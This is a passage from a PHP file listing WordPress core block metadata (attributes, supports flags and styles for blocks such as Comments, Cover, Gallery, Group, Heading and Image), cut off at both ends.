        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    )
  ),
  'comment-edit-link' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/comment-edit-link',
    'title' => 'Comment Edit Link',
    'category' => 'theme',
    'ancestor' => array(
      'core/comment-template'
    ),
    'description' => 'Displays a link to edit the comment in the WordPress Dashboard. This link is only visible to users with the edit comment capability.',
    'textdomain' => 'default',
    'usesContext' => array(
      'commentId'
    ),
    'attributes' => array(
      'linkTarget' => array(
        'type' => 'string',
        'default' => '_self'
      ),
      'textAlign' => array(
        'type' => 'string'
      )
    ),
    'supports' => array(
      'html' => false,
      'color' => array(
        'link' => true,
        'gradients' => true,
        'text' => false,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'link' => true
        )
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    )
  ),
  'comment-reply-link' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/comment-reply-link',
    'title' => 'Comment Reply Link',
    'category' => 'theme',
    'ancestor' => array(
      'core/comment-template'
    ),
    'description' => 'Displays a link to reply to a comment.',
    'textdomain' => 'default',
    'usesContext' => array(
      'commentId'
    ),
    'attributes' => array(
      'textAlign' => array(
        'type' => 'string'
      )
    ),
    'supports' => array(
      'color' => array(
        'gradients' => true,
        'link' => true,
        'text' => false,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'link' => true
        )
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'html' => false
    )
  ),
  'comment-template' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/comment-template',
    'title' => 'Comment Template',
    'category' => 'design',
    'parent' => array(
      'core/comments'
    ),
    'description' => 'Contains the block elements used to display a comment, like the title, date, author, avatar and more.',
    'textdomain' => 'default',
    'usesContext' => array(
      'postId'
    ),
    'supports' => array(
      'align' => true,
      'html' => false,
      'reusable' => false,
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'style' => 'wp-block-comment-template'
  ),
  'comments' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/comments',
    'title' => 'Comments',
    'category' => 'theme',
    'description' => 'An advanced block that allows displaying post comments using different visual configurations.',
    'textdomain' => 'default',
    'attributes' => array(
      'tagName' => array(
        'type' => 'string',
        'default' => 'div'
      ),
      'legacy' => array(
        'type' => 'boolean',
        'default' => false
      )
    ),
    'supports' => array(
      'align' => array(
        'wide',
        'full'
      ),
      'html' => false,
      'color' => array(
        'gradients' => true,
        'heading' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true,
          'link' => true
        )
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      )
    ),
    'editorStyle' => 'wp-block-comments-editor',
    'usesContext' => array(
      'postId',
      'postType'
    )
  ),
  'comments-pagination' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/comments-pagination',
    'title' => 'Comments Pagination',
    'category' => 'theme',
    'parent' => array(
      'core/comments'
    ),
    'allowedBlocks' => array(
      'core/comments-pagination-previous',
      'core/comments-pagination-numbers',
      'core/comments-pagination-next'
    ),
    'description' => 'Displays a paginated navigation to next/previous set of comments, when applicable.',
    'textdomain' => 'default',
    'attributes' => array(
      'paginationArrow' => array(
        'type' => 'string',
        'default' => 'none'
      )
    ),
    'providesContext' => array(
      'comments/paginationArrow' => 'paginationArrow'
    ),
    'supports' => array(
      'align' => true,
      'reusable' => false,
      'html' => false,
      'color' => array(
        'gradients' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true,
          'link' => true
        )
      ),
      'layout' => array(
        'allowSwitching' => false,
        'allowInheriting' => false,
        'default' => array(
          'type' => 'flex'
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-comments-pagination-editor',
    'style' => 'wp-block-comments-pagination'
  ),
  'comments-pagination-next' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/comments-pagination-next',
    'title' => 'Comments Next Page',
    'category' => 'theme',
    'parent' => array(
      'core/comments-pagination'
    ),
    'description' => 'Displays the next comment\'s page link.',
    'textdomain' => 'default',
    'attributes' => array(
      'label' => array(
        'type' => 'string'
      )
    ),
    'usesContext' => array(
      'postId',
      'comments/paginationArrow'
    ),
    'supports' => array(
      'reusable' => false,
      'html' => false,
      'color' => array(
        'gradients' => true,
        'text' => false,
        '__experimentalDefaultControls' => array(
          'background' => true
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    )
  ),
  'comments-pagination-numbers' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/comments-pagination-numbers',
    'title' => 'Comments Page Numbers',
    'category' => 'theme',
    'parent' => array(
      'core/comments-pagination'
    ),
    'description' => 'Displays a list of page numbers for comments pagination.',
    'textdomain' => 'default',
    'usesContext' => array(
      'postId'
    ),
    'supports' => array(
      'reusable' => false,
      'html' => false,
      'color' => array(
        'gradients' => true,
        'text' => false,
        '__experimentalDefaultControls' => array(
          'background' => true
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    )
  ),
  'comments-pagination-previous' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/comments-pagination-previous',
    'title' => 'Comments Previous Page',
    'category' => 'theme',
    'parent' => array(
      'core/comments-pagination'
    ),
    'description' => 'Displays the previous comment\'s page link.',
    'textdomain' => 'default',
    'attributes' => array(
      'label' => array(
        'type' => 'string'
      )
    ),
    'usesContext' => array(
      'postId',
      'comments/paginationArrow'
    ),
    'supports' => array(
      'reusable' => false,
      'html' => false,
      'color' => array(
        'gradients' => true,
        'text' => false,
        '__experimentalDefaultControls' => array(
          'background' => true
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    )
  ),
  'comments-title' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/comments-title',
    'title' => 'Comments Title',
    'category' => 'theme',
    'ancestor' => array(
      'core/comments'
    ),
    'description' => 'Displays a title with the number of comments.',
    'textdomain' => 'default',
    'usesContext' => array(
      'postId',
      'postType'
    ),
    'attributes' => array(
      'textAlign' => array(
        'type' => 'string'
      ),
      'showPostTitle' => array(
        'type' => 'boolean',
        'default' => true
      ),
      'showCommentsCount' => array(
        'type' => 'boolean',
        'default' => true
      ),
      'level' => array(
        'type' => 'number',
        'default' => 2
      )
    ),
    'supports' => array(
      'anchor' => false,
      'align' => true,
      'html' => false,
      '__experimentalBorder' => array(
        'radius' => true,
        'color' => true,
        'width' => true,
        'style' => true
      ),
      'color' => array(
        'gradients' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true,
          '__experimentalFontFamily' => true,
          '__experimentalFontStyle' => true,
          '__experimentalFontWeight' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    )
  ),
  'cover' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/cover',
    'title' => 'Cover',
    'category' => 'media',
    'description' => 'Add an image or video with a text overlay.',
    'textdomain' => 'default',
    'attributes' => array(
      'url' => array(
        'type' => 'string'
      ),
      'useFeaturedImage' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'id' => array(
        'type' => 'number'
      ),
      'alt' => array(
        'type' => 'string',
        'default' => ''
      ),
      'hasParallax' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'isRepeated' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'dimRatio' => array(
        'type' => 'number',
        'default' => 100
      ),
      'overlayColor' => array(
        'type' => 'string'
      ),
      'customOverlayColor' => array(
        'type' => 'string'
      ),
      'isUserOverlayColor' => array(
        'type' => 'boolean'
      ),
      'backgroundType' => array(
        'type' => 'string',
        'default' => 'image'
      ),
      'focalPoint' => array(
        'type' => 'object'
      ),
      'minHeight' => array(
        'type' => 'number'
      ),
      'minHeightUnit' => array(
        'type' => 'string'
      ),
      'gradient' => array(
        'type' => 'string'
      ),
      'customGradient' => array(
        'type' => 'string'
      ),
      'contentPosition' => array(
        'type' => 'string'
      ),
      'isDark' => array(
        'type' => 'boolean',
        'default' => true
      ),
      'allowedBlocks' => array(
        'type' => 'array'
      ),
      'templateLock' => array(
        'type' => array(
          'string',
          'boolean'
        ),
        'enum' => array(
          'all',
          'insert',
          'contentOnly',
          false
        )
      ),
      'tagName' => array(
        'type' => 'string',
        'default' => 'div'
      )
    ),
    'usesContext' => array(
      'postId',
      'postType'
    ),
    'supports' => array(
      'anchor' => true,
      'align' => true,
      'html' => false,
      'shadow' => true,
      'spacing' => array(
        'padding' => true,
        'margin' => array(
          'top',
          'bottom'
        ),
        'blockGap' => true,
        '__experimentalDefaultControls' => array(
          'padding' => true,
          'blockGap' => true
        )
      ),
      '__experimentalBorder' => array(
        'color' => true,
        'radius' => true,
        'style' => true,
        'width' => true,
        '__experimentalDefaultControls' => array(
          'color' => true,
          'radius' => true,
          'style' => true,
          'width' => true
        )
      ),
      'color' => array(
        '__experimentalDuotone' => '> .wp-block-cover__image-background, > .wp-block-cover__video-background',
        'heading' => true,
        'text' => true,
        'background' => false,
        '__experimentalSkipSerialization' => array(
          'gradients'
        ),
        'enableContrastChecker' => false
      ),
      'dimensions' => array(
        'aspectRatio' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'layout' => array(
        'allowJustification' => false
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-cover-editor',
    'style' => 'wp-block-cover'
  ),
  'details' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/details',
    'title' => 'Details',
    'category' => 'text',
    'description' => 'Hide and show additional content.',
    'keywords' => array(
      'accordion',
      'summary',
      'toggle',
      'disclosure'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'showContent' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'summary' => array(
        'type' => 'rich-text',
        'source' => 'rich-text',
        'selector' => 'summary'
      )
    ),
    'supports' => array(
      '__experimentalOnEnter' => true,
      'align' => array(
        'wide',
        'full'
      ),
      'color' => array(
        'gradients' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      '__experimentalBorder' => array(
        'color' => true,
        'width' => true,
        'style' => true
      ),
      'html' => false,
      'spacing' => array(
        'margin' => true,
        'padding' => true,
        'blockGap' => true,
        '__experimentalDefaultControls' => array(
          'margin' => false,
          'padding' => false
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'layout' => array(
        'allowEditing' => false
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-details-editor',
    'style' => 'wp-block-details'
  ),
  'embed' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/embed',
    'title' => 'Embed',
    'category' => 'embed',
    'description' => 'Add a block that displays content pulled from other sites, like Twitter or YouTube.',
    'textdomain' => 'default',
    'attributes' => array(
      'url' => array(
        'type' => 'string',
        '__experimentalRole' => 'content'
      ),
      'caption' => array(
        'type' => 'rich-text',
        'source' => 'rich-text',
        'selector' => 'figcaption',
        '__experimentalRole' => 'content'
      ),
      'type' => array(
        'type' => 'string',
        '__experimentalRole' => 'content'
      ),
      'providerNameSlug' => array(
        'type' => 'string',
        '__experimentalRole' => 'content'
      ),
      'allowResponsive' => array(
        'type' => 'boolean',
        'default' => true
      ),
      'responsive' => array(
        'type' => 'boolean',
        'default' => false,
        '__experimentalRole' => 'content'
      ),
      'previewable' => array(
        'type' => 'boolean',
        'default' => true,
        '__experimentalRole' => 'content'
      )
    ),
    'supports' => array(
      'align' => true,
      'spacing' => array(
        'margin' => true
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-embed-editor',
    'style' => 'wp-block-embed'
  ),
  'file' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/file',
    'title' => 'File',
    'category' => 'media',
    'description' => 'Add a link to a downloadable file.',
    'keywords' => array(
      'document',
      'pdf',
      'download'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'id' => array(
        'type' => 'number'
      ),
      'href' => array(
        'type' => 'string'
      ),
      'fileId' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'a:not([download])',
        'attribute' => 'id'
      ),
      'fileName' => array(
        'type' => 'rich-text',
        'source' => 'rich-text',
        'selector' => 'a:not([download])'
      ),
      'textLinkHref' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'a:not([download])',
        'attribute' => 'href'
      ),
      'textLinkTarget' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'a:not([download])',
        'attribute' => 'target'
      ),
      'showDownloadButton' => array(
        'type' => 'boolean',
        'default' => true
      ),
      'downloadButtonText' => array(
        'type' => 'rich-text',
        'source' => 'rich-text',
        'selector' => 'a[download]'
      ),
      'displayPreview' => array(
        'type' => 'boolean'
      ),
      'previewHeight' => array(
        'type' => 'number',
        'default' => 600
      )
    ),
    'supports' => array(
      'anchor' => true,
      'align' => true,
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'color' => array(
        'gradients' => true,
        'link' => true,
        'text' => false,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'link' => true
        )
      ),
      'interactivity' => true
    ),
    'editorStyle' => 'wp-block-file-editor',
    'style' => 'wp-block-file'
  ),
  'footnotes' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/footnotes',
    'title' => 'Footnotes',
    'category' => 'text',
    'description' => 'Display footnotes added to the page.',
    'keywords' => array(
      'references'
    ),
    'textdomain' => 'default',
    'usesContext' => array(
      'postId',
      'postType'
    ),
    'supports' => array(
      '__experimentalBorder' => array(
        'radius' => true,
        'color' => true,
        'width' => true,
        'style' => true,
        '__experimentalDefaultControls' => array(
          'radius' => false,
          'color' => false,
          'width' => false,
          'style' => false
        )
      ),
      'color' => array(
        'background' => true,
        'link' => true,
        'text' => true,
        '__experimentalDefaultControls' => array(
          'link' => true,
          'text' => true
        )
      ),
      'html' => false,
      'multiple' => false,
      'reusable' => false,
      'inserter' => false,
      'spacing' => array(
        'margin' => true,
        'padding' => true,
        '__experimentalDefaultControls' => array(
          'margin' => false,
          'padding' => false
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalFontStyle' => true,
        '__experimentalFontWeight' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalTextTransform' => true,
        '__experimentalWritingMode' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'style' => 'wp-block-footnotes'
  ),
  'freeform' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/freeform',
    'title' => 'Classic',
    'category' => 'text',
    'description' => 'Use the classic WordPress editor.',
    'textdomain' => 'default',
    'attributes' => array(
      'content' => array(
        'type' => 'string',
        'source' => 'raw'
      )
    ),
    'supports' => array(
      'className' => false,
      'customClassName' => false,
      'reusable' => false
    ),
    'editorStyle' => 'wp-block-freeform-editor'
  ),
  'gallery' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/gallery',
    'title' => 'Gallery',
    'category' => 'media',
    'allowedBlocks' => array(
      'core/image'
    ),
    'description' => 'Display multiple images in a rich gallery.',
    'keywords' => array(
      'images',
      'photos'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'images' => array(
        'type' => 'array',
        'default' => array(
          
        ),
        'source' => 'query',
        'selector' => '.blocks-gallery-item',
        'query' => array(
          'url' => array(
            'type' => 'string',
            'source' => 'attribute',
            'selector' => 'img',
            'attribute' => 'src'
          ),
          'fullUrl' => array(
            'type' => 'string',
            'source' => 'attribute',
            'selector' => 'img',
            'attribute' => 'data-full-url'
          ),
          'link' => array(
            'type' => 'string',
            'source' => 'attribute',
            'selector' => 'img',
            'attribute' => 'data-link'
          ),
          'alt' => array(
            'type' => 'string',
            'source' => 'attribute',
            'selector' => 'img',
            'attribute' => 'alt',
            'default' => ''
          ),
          'id' => array(
            'type' => 'string',
            'source' => 'attribute',
            'selector' => 'img',
            'attribute' => 'data-id'
          ),
          'caption' => array(
            'type' => 'rich-text',
            'source' => 'rich-text',
            'selector' => '.blocks-gallery-item__caption'
          )
        )
      ),
      'ids' => array(
        'type' => 'array',
        'items' => array(
          'type' => 'number'
        ),
        'default' => array(
          
        )
      ),
      'shortCodeTransforms' => array(
        'type' => 'array',
        'items' => array(
          'type' => 'object'
        ),
        'default' => array(
          
        )
      ),
      'columns' => array(
        'type' => 'number',
        'minimum' => 1,
        'maximum' => 8
      ),
      'caption' => array(
        'type' => 'rich-text',
        'source' => 'rich-text',
        'selector' => '.blocks-gallery-caption'
      ),
      'imageCrop' => array(
        'type' => 'boolean',
        'default' => true
      ),
      'randomOrder' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'fixedHeight' => array(
        'type' => 'boolean',
        'default' => true
      ),
      'linkTarget' => array(
        'type' => 'string'
      ),
      'linkTo' => array(
        'type' => 'string'
      ),
      'sizeSlug' => array(
        'type' => 'string',
        'default' => 'large'
      ),
      'allowResize' => array(
        'type' => 'boolean',
        'default' => false
      )
    ),
    'providesContext' => array(
      'allowResize' => 'allowResize',
      'imageCrop' => 'imageCrop',
      'fixedHeight' => 'fixedHeight'
    ),
    'supports' => array(
      'anchor' => true,
      'align' => true,
      'html' => false,
      'units' => array(
        'px',
        'em',
        'rem',
        'vh',
        'vw'
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true,
        'blockGap' => array(
          'horizontal',
          'vertical'
        ),
        '__experimentalSkipSerialization' => array(
          'blockGap'
        ),
        '__experimentalDefaultControls' => array(
          'blockGap' => true,
          'margin' => false,
          'padding' => false
        )
      ),
      'color' => array(
        'text' => false,
        'background' => true,
        'gradients' => true
      ),
      'layout' => array(
        'allowSwitching' => false,
        'allowInheriting' => false,
        'allowEditing' => false,
        'default' => array(
          'type' => 'flex'
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-gallery-editor',
    'style' => 'wp-block-gallery'
  ),
  'group' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/group',
    'title' => 'Group',
    'category' => 'design',
    'description' => 'Gather blocks in a layout container.',
    'keywords' => array(
      'container',
      'wrapper',
      'row',
      'section'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'tagName' => array(
        'type' => 'string',
        'default' => 'div'
      ),
      'templateLock' => array(
        'type' => array(
          'string',
          'boolean'
        ),
        'enum' => array(
          'all',
          'insert',
          'contentOnly',
          false
        )
      ),
      'allowedBlocks' => array(
        'type' => 'array'
      )
    ),
    'supports' => array(
      '__experimentalOnEnter' => true,
      '__experimentalOnMerge' => true,
      '__experimentalSettings' => true,
      'align' => array(
        'wide',
        'full'
      ),
      'anchor' => true,
      'ariaLabel' => true,
      'html' => false,
      'background' => array(
        'backgroundImage' => true,
        'backgroundSize' => true,
        '__experimentalDefaultControls' => array(
          'backgroundImage' => true
        )
      ),
      'color' => array(
        'gradients' => true,
        'heading' => true,
        'button' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'spacing' => array(
        'margin' => array(
          'top',
          'bottom'
        ),
        'padding' => true,
        'blockGap' => true,
        '__experimentalDefaultControls' => array(
          'padding' => true,
          'blockGap' => true
        )
      ),
      'dimensions' => array(
        'minHeight' => true
      ),
      '__experimentalBorder' => array(
        'color' => true,
        'radius' => true,
        'style' => true,
        'width' => true,
        '__experimentalDefaultControls' => array(
          'color' => true,
          'radius' => true,
          'style' => true,
          'width' => true
        )
      ),
      'position' => array(
        'sticky' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'layout' => array(
        'allowSizingOnChildren' => true
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-group-editor',
    'style' => 'wp-block-group'
  ),
  'heading' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/heading',
    'title' => 'Heading',
    'category' => 'text',
    'description' => 'Introduce new sections and organize content to help visitors (and search engines) understand the structure of your content.',
    'keywords' => array(
      'title',
      'subtitle'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'textAlign' => array(
        'type' => 'string'
      ),
      'content' => array(
        'type' => 'rich-text',
        'source' => 'rich-text',
        'selector' => 'h1,h2,h3,h4,h5,h6',
        '__experimentalRole' => 'content'
      ),
      'level' => array(
        'type' => 'number',
        'default' => 2
      ),
      'placeholder' => array(
        'type' => 'string'
      )
    ),
    'supports' => array(
      'align' => array(
        'wide',
        'full'
      ),
      'anchor' => true,
      'className' => true,
      'splitting' => true,
      'color' => array(
        'gradients' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true,
        '__experimentalDefaultControls' => array(
          'margin' => false,
          'padding' => false
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontStyle' => true,
        '__experimentalFontWeight' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalWritingMode' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      '__unstablePasteTextInline' => true,
      '__experimentalSlashInserter' => true,
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-heading-editor',
    'style' => 'wp-block-heading'
  ),
  'home-link' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/home-link',
    'category' => 'design',
    'parent' => array(
      'core/navigation'
    ),
    'title' => 'Home Link',
    'description' => 'Create a link that always points to the homepage of the site. Usually not necessary if there is already a site title link present in the header.',
    'textdomain' => 'default',
    'attributes' => array(
      'label' => array(
        'type' => 'string'
      )
    ),
    'usesContext' => array(
      'textColor',
      'customTextColor',
      'backgroundColor',
      'customBackgroundColor',
      'fontSize',
      'customFontSize',
      'style'
    ),
    'supports' => array(
      'reusable' => false,
      'html' => false,
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-home-link-editor',
    'style' => 'wp-block-home-link'
  ),
  'html' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/html',
    'title' => 'Custom HTML',
    'category' => 'widgets',
    'description' => 'Add custom HTML code and preview it as you edit.',
    'keywords' => array(
      'embed'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'content' => array(
        'type' => 'string',
        'source' => 'raw'
      )
    ),
    'supports' => array(
      'customClassName' => false,
      'className' => false,
      'html' => false,
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-html-editor'
  ),
  'image' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/image',
    'title' => 'Image',
    'category' => 'media',
    'usesContext' => array(
      'allowResize',
      'imageCrop',
      'fixedHeight'
    ),
    'description' => 'Insert an image to make a visual statement.',
    'keywords' => array(
      'img',
      'photo',
      'picture'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'url' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'img',
        'attribute' => 'src',
        '__experimentalRole' => 'content'
      ),
      'alt' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'img',
        'attribute' => 'alt',
        'default' => '',
        '__experimentalRole' => 'content'
      ),
      'caption' => array(
        'type' => 'rich-text',
        'source' => 'rich-text',
        'selector' => 'figcaption',
        '__experimentalRole' => 'content'
      ),
      'lightbox' => array(
        'type' => 'object',
        'enabled' => array(
          'type' => 'boolean'
        )
      ),
      'title' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'img',
        'attribute' => 'title',
        '__experimentalRole' => 'content'
      ),
      'href' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'figure > a',
        'attribute' => 'href',
        '__experimentalRole' => 'content'
      ),
      'rel' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'figure > a',
        'attribute' => 'rel'
      ),
      'linkClass' => array(
        'type' => 'string',
